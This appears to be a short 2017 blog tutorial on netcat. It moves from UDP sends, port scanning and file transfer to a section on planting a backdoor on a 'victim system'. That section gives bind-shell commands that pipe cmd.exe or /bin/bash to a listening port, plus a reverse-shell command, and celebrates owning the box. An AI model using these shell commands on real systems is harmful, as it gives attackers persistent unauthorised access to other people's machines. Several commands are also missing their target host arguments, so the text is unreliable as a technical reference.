Thursday, 25 May 2017

Creating Backdoor using netcat

---> If you would like to send a UDP packet instead of initiating a TCP connection, you can use the
-u option:

# netcat -u host port

---> Use Netcat for Port Scanning

# netcat -z -v 1-1000 

---> Communicate through Netcat. you can tell netcat to listen to a specific port for connections. We can do this by providing the -l parameter and choosing a port:

# netcat -l 4444

This will tell netcat to listen for TCP connections on port 4444. As a regular (non-root) user, you will not be able to open any ports under 1000, as a security measure. On a second server, we can connect to the first machine on the port number we choose. We do this the same way we've been establishing
connections previously:

# netcat 4444

---> How To Send Files through Netcat

Because we are establishing a regular TCP connection, we can transmit just about
any kind of information over that connection. It is not limited to chat messages that
are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.

# netcat -l 4444 > received_file

On the second computer, create a simple text file by typing:

# echo "Hello, this is a file" > original_file

We can now use this file as an input for the netcat connection we will establish to the listening computer. The file will be transmitted just as if we had typed it interactively:

# netcat 4444 < original_file

We can see on the computer that was awaiting a connection, that we now have a new file called "received_file" with the contents of the file we typed on the other computer:

cat received_file

---> Create a Backdoor

Create a backdoor on the victim system that we can come back to at any time. The command will vary slightly based upon whether we are attacking a Linux or Windows system.

For Windows we use:
# nc -l -p 6996 -e cmd.exe

For Linux we use:
# nc -l -p 6996 -e /bin/bash

This will open a listener on the system that will "pipe" the command shell or the Linux bash shell to the connecting system. Then on our attacking system, we type:

# nc 6996

As you can see, the Windows command prompt has been piped through our netcat connection directly to our attacking system! We own that box!

  Creating a shell:
 ---- ---- ----- ----
Remote machine:  # nc -l -p 6996 -e /bin/bash
Local machine: # nc 6996

 Creating a reverse shell:
---- ----- ----- ----- -----
Local machine: # nc 6996
Remote machine: # nc -e /bin/bash local_machine 6996
                            # nc -e /bin/bash -l -p 6996 &

No comments:

Post a Comment